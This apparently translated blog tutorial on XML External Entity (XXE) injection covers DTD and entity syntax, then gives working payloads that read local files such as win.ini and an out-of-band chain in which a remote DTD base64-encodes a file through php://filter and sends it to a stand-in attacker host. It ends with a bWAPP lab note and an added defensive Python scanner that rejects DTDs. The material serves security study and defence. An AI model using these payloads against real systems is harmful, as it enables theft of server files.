OWASP XXE (XML External Entity injection)

Precondition

In libxml 2.9.1 and later, external entities are not parsed by default.
You can check the libxml version in the phpinfo() output: append phpinfo.php to the URL.

XML document

Composition: XML declaration, DTD part, XML body
(Figure: an example document with cross-domain-policy as the root node and an external DTD referenced from http://...dtd.)

DTD (Document Type Definition)
A DTD defines the structural constraints of an XML document; it can be declared inline (internal subset) or pulled in by an external reference.
DTD usage reference: https://blog.csdn.net/qq_40849099/article/details/80457850

DTD knowledge

1. Internal entity declaration

<!ENTITY entity-name "entity value">
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >
]>

Declaring the element as ANY means any content is accepted; the interesting part is the entity declaration. An entity behaves like a variable, and it is referenced in the XML body with the & symbol:

<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

&xxe; references the xxe entity defined above, and is replaced by "test" when the document is output.
Note: when the payload travels in a URL or form parameter, the & must be URL-encoded, otherwise it is interpreted as a parameter separator.

2. External entity declaration

<!ENTITY entity-name SYSTEM "URI/URL">

External references support protocols such as http and file. Which protocols are available depends on the language and parser, but a few are common to most of them.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >
]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

Entities fall into two kinds: general entities and parameter entities.
General entities are declared in the DTD and referenced in the XML body as &entity-name;.
Parameter entities are declared and referenced inside the DTD itself, with the % prefix:

<!ENTITY % entity-name "entity value"> / <!ENTITY % entity-name SYSTEM "URI">
xx.dtd file:
<!ENTITY evil SYSTEM "file:/// :/windows/win.ini" >
xx.xml file:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://ip:port/xx.dtd" >
%xxe;]>
<foo>&evil;</foo>

(1) A parameter entity is declared in the DTD as % entity-name (note the space after %) and referenced only inside the DTD as %entity-name;
(2) Only inside a DTD may a parameter entity declaration refer to other entities
(3) Like general entities, parameter entities can also point at external resources

Reference document: https://xz.aliyun.com/t/3357

Exploiting XXE

Only the DTD part of the XML document is usable for this; the payload lives entirely in the DOCTYPE.

Injected content:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>

or

Injected content:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/xx.dtd" >
%xxe;]>
<foo>&xx;</foo>
Contents of the external xx.dtd:
<!ENTITY xx SYSTEM "file:///c:/windows/win.ini" >

If the application echoes the parsed content, the file content is visible directly in the response. If there is
no echo, extract the data through an out-of-band channel: first use php://filter to read the target file as base64,
then have the parser send that content in an HTTP request to the server that collects the data (the attack server, xxx.xxx.xxx).

Injected content:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>

Contents of the external test.dtd. The % inside the nested declaration cannot be written literally; it must be encoded as the character reference &#37;:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip?p=%file;'>">

If the response contains an error but no echo, decode the base64 content straight from the error message. If there is
neither echo nor error, decode the content received in the collecting server's access log (access.log).
Where can I find the error log?
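The following is an added example and not part of the original post: a defender-side check in Python that scans request bodies shaped like the payloads in the DTD knowledge and exploitation sections above (constructed samples, including the &#37; encoding trick), and a parser wrapper that refuses any DTD, which is the OWASP-recommended mitigation. The hostnames ip and test.dtd are the page's own placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies shaped like the payloads described on this page.
SAMPLES = {
    "benign": '<?xml version="1.0"?><creds><user>alice</user><pass>mypass</pass></creds>',
    "internal": ('<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
                 '<!ENTITY xxe "test">]><creds><user>&xxe;</user></creds>'),
    "external": ('<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
                 '<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>'),
    "parameter": ('<?xml version="1.0"?><!DOCTYPE convert ['
                  '<!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]><foo/>'),
    # Constructed copy of a fetched test.dtd: the nested % is hidden as the reference &#37;
    "dtd_file": ('<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">'
                 '<!ENTITY % int "<!ENTITY &#37; send SYSTEM \'http://ip?p=%file;\'>">'),
}

_CHAR_REF = re.compile(r"&#(x[0-9a-fA-F]+|[0-9]+);")

def _decode_ref(m):
    ref = m.group(1)
    return chr(int(ref[1:], 16)) if ref[0] in "xX" else chr(int(ref))

def normalise(body: str) -> str:
    """Resolve numeric character references so that &#37; is scanned as a literal %."""
    return _CHAR_REF.sub(_decode_ref, body)

# Ordered indicator list; each name is reported once if its pattern matches.
INDICATORS = [
    ("doctype",          re.compile(r"<!DOCTYPE\b", re.I)),
    ("entity-decl",      re.compile(r"<!ENTITY\s", re.I)),
    ("external-entity",  re.compile(r"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I)),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%", re.I)),
    ("php-filter",       re.compile(r"php://filter", re.I)),
]

def xxe_indicators(body: str) -> list:
    """Return the XXE indicators present in a body, for logging or alerting."""
    text = normalise(body)
    return [name for name, rx in INDICATORS if rx.search(text)]

def parse_untrusted(body: str) -> ET.Element:
    """Parse client-supplied XML, refusing any document that carries a DTD at all."""
    if "doctype" in xxe_indicators(body):
        raise ValueError("DTD not allowed in client-supplied XML")
    return ET.fromstring(body)

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:10s} -> {xxe_indicators(body)}")
```

Rejecting the DOCTYPE outright is simpler and safer than trying to allow "harmless" DTDs; the indicator list is what you would feed into request logging to spot the blind and out-of-band variants.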

Hands-on (bWAPP)

(Screenshots of the bWAPP exercise omitted.)
One pitfall here: the request can only be sent once, not repeatedly. To try again, capture the packet again.


Source: blog.csdn.net/zzhokok/article/details/107937006